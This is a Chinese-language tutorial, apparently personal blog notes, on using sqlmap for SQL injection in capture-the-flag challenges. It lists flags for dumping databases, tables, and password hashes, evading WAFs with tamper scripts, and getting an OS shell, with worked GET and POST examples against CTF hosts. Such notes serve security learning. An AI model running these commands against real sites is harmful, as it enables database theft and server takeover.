本文最后更新于77 天前,其中的信息可能已经过时,如有错误请发送邮件到1416359402@qq.com
sqlmap的使用

90%的SQL注入漏洞挖掘靠它!SQLMap详细使用指南-CSDN博客
GET注入
指定url
-u 参数,指定需要检测的url,单/双引号包裹。中间如果有提示,就输入y。或 –batch

-D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
-T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
-C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。
--dbs 获取数据库
--current-db 当前库
--tables 获取表
--columns 获取字段 (不指定表名,默认获取当前数据库中所有表的字段)
--dump 获取值,也就是表中的数据。可以指定具体的库、表、字段
--users 获取数据库的所有用户名。
--passwords 获取所有数据库用户的密码(哈希值)
--is-dba 判断当前登录的用户是不是数据库的管理员账号。
--tamper 指定绕过脚本,绕过WAF或ids等
--search 搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名
--os-shell 获取操作系统交互式 Shell(需 DBA 权限
--tamper=space2comment 绕过waf避免空格被过滤
--batch (默认确认)不再询问是否确认
--level=1 执行测试的等级(1-5,默认为1,常用3)
--risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。
示例:

遇到这种?id=1
直接蹦出username
发现和别的sql注入不一样
用sqlmap直接跑

sqlmap -u http://challenge.qsnctf.com:47549/?id=1 --dbs
查找数据库

sqlmap -u http://challenge.qsnctf.com:47549/?id=1 -D ctf --tables
sqlmap -u http://challenge.qsnctf.com:47549/?id=1 -D ctf -T flag --dump
拿到flag
POST注入
操作步骤:
- 输入任意账号密码,点击登录,Burp Suite 捕获 POST 请求。
- 将完整请求(包括 Headers)复制保存为
1.txt:
sqlmap.py -r 1.txt -p username --dbs
sqlmap -u " " --data "user=admin&pass=*"
| 参数 | 作用 |
|---|---|
-r 1.txt | 读取保存的请求包 |
-p username | 指定要测试的参数(可避免扫描所有字段) |
--dbs | 获取所有数据库 |

查看当前数据库
sqlmap -r 1.txt -p username --current-db
获取所有数据库
sqlmap -r 1.txt -p username --dbs --batch
获取当前库的所有表
sqlmap -r 1.txt -p username -D security --tables --batch
查看某表字段信息
sqlmap -r 1.txt -p username -D security -T users --columns --batch
导出字段内容
sqlmap -r 1.txt -p username -D security -T users -C username,password --dump --batch
示例:
抓包

注意(sqlmap跑包时从当前文件1.txt中打开终端)
跑库名:
sqlmap -r 1.txt --dbs --batch --tamper=space2comment (当有waf时加上--tamper)

跑表名:
sqlmap -r 1.txt -D web2 --tables --batch --tamper=space2comment (当有waf时加上--tamper)

跑字段:
sqlmap -r 1.txt -D web2 -T flag --columns --batch --tamper=space2comment (当有waf时加上--tamper)

得到flag
sqlmap -r 1.txt -D web2 -T flag -C flag --dump --batch --tamper=space2comment (当有waf时加上--tamper)

–os-shell获取操作系统
sqlmap -u http://challenge.qsnctf.com:54969/?id=1 --os-shell --batch
cat /flag





